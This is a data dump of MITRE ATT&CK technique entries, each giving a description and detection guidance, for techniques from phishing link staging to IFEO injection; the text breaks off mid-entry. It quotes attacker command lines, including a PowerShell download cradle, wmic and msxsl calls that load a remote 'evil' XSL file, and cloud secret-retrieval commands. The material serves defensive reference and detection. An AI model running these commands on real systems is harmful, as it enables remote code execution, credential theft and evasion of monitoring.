T1608.005 | Stage Capabilities: Link Target | Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).
Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)
Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022) | 17 March 2021 | enterprise-attack | Resource Development | If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001). |
T1584.004 | Compromise Infrastructure: Server | Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. | 01 October 2020 | enterprise-attack | Resource Development | Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. |
T1007 | System Service Discovery | Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | 31 May 2017 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems. | 11 March 2020 | enterprise-attack | Exfiltration | Monitor file access on removable media. Detect processes that execute when removable media are mounted. |
T1564.006 | Hide Artifacts: Run Virtual Instance | Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020) | 29 June 2020 | enterprise-attack | Defense Evasion | Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.
Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. <code>-silent</code>, <code>-ignore-reboot</code>), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. <code>VBoxManage startvm $VM --type headless</code>).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. <code>VBoxManage.exe setextradata global GUI/SuppressMessages "all"</code>).
Monitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software.
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior. |
T1564.004 | Hide Artifacts: NTFS File Attributes | Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015) | 13 March 2020 | enterprise-attack | Defense Evasion | Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the <code>ZwSetEaFile</code> and <code>ZwQueryEaFile</code> Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: <code>file.ext:ads[.ext]</code>) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The <code>dir /r</code> command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a <code>-stream</code> parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) |
T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. | 09 March 2020 | enterprise-attack | Exfiltration | Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity. |
T1567.004 | Exfiltration Over Web Service: Exfiltration Over Webhook | Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.
Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks) | 20 July 2023 | enterprise-attack | Exfiltration | null |
T1105 | Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync) | 31 May 2017 | enterprise-attack | Command and Control | Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows <code>netsh interface portproxy</code> modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) |
T1562.001 | Impair Defenses: Disable or Modify Tools | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) | 21 February 2020 | enterprise-attack | Defense Evasion | Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.
Lack of expected log events may be suspicious. |
T1562.004 | Impair Defenses: Disable or Modify System Firewall | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules. | 21 February 2020 | enterprise-attack | Defense Evasion | Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls. |
T1560 | Archive Collected Data | An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method. | 20 February 2020 | enterprise-attack | Collection | Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) |
T1555.006 | Credentials from Password Stores: Cloud Secrets Management Stores | Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.
Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.
If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API. | 25 September 2023 | enterprise-attack | Credential Access | null |
T1578.001 | Modify Cloud Compute Infrastructure: Create Snapshot | An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020) | 09 June 2020 | enterprise-attack | Defense Evasion | The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM) |
T1602 | Data from Configuration Repository | Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) | 19 October 2020 | enterprise-attack | Collection | Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities) |
T1053.006 | Scheduled Task/Job: Systemd Timers | Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d) | 12 October 2020 | enterprise-attack | Execution, Persistence, Privilege Escalation | Systemd timer unit files may be detected by auditing file creation and modification events within the <code>/etc/systemd/system</code>, <code>/usr/lib/systemd/system/</code>, and <code>~/.config/systemd/user/</code> directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: <code>systemctl list-timers –all</code>. Analyze the contents of corresponding <code>.service</code> files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) |
T1584.001 | Compromise Infrastructure: Domains | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) | 01 October 2020 | enterprise-attack | Resource Development | Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. |
T1220 | XSL Script Processing | Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* <code>msxsl.exe customers[.]xml script[.]xsl</code>
* <code>msxsl.exe script[.]xsl script[.]xsl</code>
* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code> | 17 October 2018 | enterprise-attack | Defense Evasion | Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious. |
T1546.012 | Event Triggered Execution: Image File Execution Options Injection | Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) | 24 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as <code>DEBUG_PROCESS</code> and <code>DEBUG_ONLY_THIS_PROCESS</code>. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as <code>RegCreateKeyEx</code> and <code>RegSetValueEx</code>. (Citation: Elastic Process Injection July 2017) |
T1055.011 | Process Injection: Extra Window Memory Injection | Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
